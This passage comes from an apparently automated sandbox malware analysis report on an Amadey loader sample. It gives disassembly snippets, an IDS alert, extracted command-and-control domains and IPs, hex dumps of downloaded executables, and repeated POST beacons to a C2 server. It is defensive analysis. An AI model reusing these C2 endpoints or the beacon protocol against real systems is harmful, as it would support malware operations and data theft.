Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1272D010h]	12_2_0042FE40
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]	12_2_0044D7F0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov word ptr [edi], cx	12_2_00429840
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [00451018h]	12_2_0040F066
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	12_2_00402800
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h	12_2_004480C0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov word ptr [eax], cx	12_2_00410897
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx]	12_2_00410897
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]	12_2_0044D950
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0D0EF488h]	12_2_0042D92B
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	12_2_004019E0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-51AE6CD0h]	12_2_0044AA55
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov dword ptr [esp], 8B8A8924h	12_2_0043F250
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+19DCC0F6h]	12_2_00445250
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ebx, byte ptr [ebp+edi+00h]	12_2_00445250
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov byte ptr [ecx], dl	12_2_00423A70
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov byte ptr [edi], cl	12_2_00423A70
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], C446A772h	12_2_0041E21B
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh]	12_2_0041E21B
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh]	12_2_0041E21B
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h	12_2_0041E21B
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then jmp eax	12_2_0041E21B
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+70h]	12_2_0041E21B
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-49268212h]	12_2_0041E21B
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	12_2_00448220
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	12_2_004292C0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6BB1A2B4h]	12_2_004482E0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000FAh]	12_2_00433A88
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then push eax	12_2_00449B7F
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h]	12_2_0041C833
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	12_2_0040A320
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	12_2_0040A320
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000FAh]	12_2_00433A88
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+34h]	12_2_00433330
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov byte ptr [esi], cl	12_2_00436BE5
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+68h]	12_2_00437BB8
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov byte ptr [ecx], dl	12_2_00411C5F
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	12_2_00435C60
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov dword ptr [esp+08h], ebx	12_2_00445C70
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov word ptr [eax], cx	12_2_00410C1B
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx]	12_2_00410C1B
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx eax, byte ptr [esp+esi+5Ch]	12_2_0042F430
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	12_2_00441480
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+49408C66h]	12_2_00428CB0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	12_2_0044BD46
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov byte ptr [eax], cl	12_2_0041EDDC
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6D3F2F7Eh]	12_2_00420D90
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [eax]	12_2_00448590
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+50h]	12_2_004305B2
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	12_2_0041AE40
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov byte ptr [edi], cl	12_2_00438E42
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov dword ptr [esp+10h], ecx	12_2_00438E42
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then add eax, esi	12_2_00437627
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+ecx+00h]	12_2_0040CE30
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+esi]	12_2_0040CE30
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov dword ptr [esp+10h], ecx	12_2_00438E39
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+ecx+0Ah]	12_2_00445ED1
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	12_2_00445ED1
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	12_2_004236EB
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov byte ptr [ebx], cl	12_2_004386EC
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov word ptr [eax], cx	12_2_00432F60
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edi, byte ptr [esi+edx]	12_2_00432F60
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov word ptr [eax], cx	12_2_00432F60
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	12_2_0041AF00
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-4926828Ah]	12_2_0041AF00
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1A92C912h]	12_2_0040C710
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2Ah]	12_2_0044C7D0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+04h]	12_2_00412FDB
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	12_2_00446790
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov byte ptr [eax], cl	12_2_0041EFAD
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+18h]	12_2_0040EFAE
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	12_2_00433FB0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49731 -> 176.113.115.6:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: zfurrycomp.top/kFwo
Source: Malware configuration extractor	URLs: crosshairc.life/dAnjhw
Source: Malware configuration extractor	URLs: mrodularmall.top/aNzS
Source: Malware configuration extractor	URLs: jowinjoinery.icu/bdWUa
Source: Malware configuration extractor	URLs: legenassedk.top/bdpWO
Source: Malware configuration extractor	URLs: htardwarehu.icu/Sbdsa
Source: Malware configuration extractor	URLs: cjlaspcorne.icu/DbIps
Source: Malware configuration extractor	URLs: bugildbett.top/bAuz
Source: Malware configuration extractor	IPs: 176.113.115.6
Source: Malware configuration extractor	IPs: 185.156.73.73
Source: Malware configuration extractor	IPs: 45.91.200.135

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 07:12:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 21:33:51 GMTETag: "bd540-6302bf61badc0"Accept-Ranges: bytesContent-Length: 775488Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 1f bf d1 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 2e 05 00 00 e2 00 00 00 00 00 00 d2 77 03 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 0b 00 00 06 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 c6 05 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0b 00 40 45 00 00 00 30 06 00 6c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 8b 05 00 18 00 00 00 98 4f 05 00 c0 00 00 00 00 00 00 00 00 00 00 00 c0 c7 05 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 2c 05 00 00 10 00 00 00 2e 05 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 a1 00 00 00 40 05 00 00 a2 00 00 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2c 00 00 00 f0 05 00 00 16 00 00 00 d6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 20 06 00 00 02 00 00 00 ec 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 27 00 00 00 30 06 00 00 28 00 00 00 ee 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 7a 05 00 00 60 06 00 00 7a 05 00 00 16 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 07:12:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 13 Mar 2025 05:52:21 GMTETag: "3c2800-63032eceb780e"Accept-Ranges: bytesContent-Length: 3942400Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 70 4d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 0e 25 00 00 6a 29 00 00 00 00 00 00 a0 a0 00 00 10 00 00 00 50 48 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 d0 a0 00 00 04 00 00 2b 6a 3c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 90 53 00 68 00 00 00 00 80 52 00 bc 0a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 53 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 52 00 00 10 00 00 00 ea 1f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 bc 0a 01 00 00 80 52 00 00 0c 01 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 53 00 00 02 00 00 00 06 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 31 00 00 a0 53 00 00 02 00 00 00 08 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6d 6d 76 67 70 6f 73 00 00 1b 00 00 90 85 00 00 f8 1a 00 00 0a 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 63 75 61 72 74 64 74 00 10 00 00 00 90 a0 00 00 04 00 00 00 02 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 a0 00 00 22 00 00 00 06 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
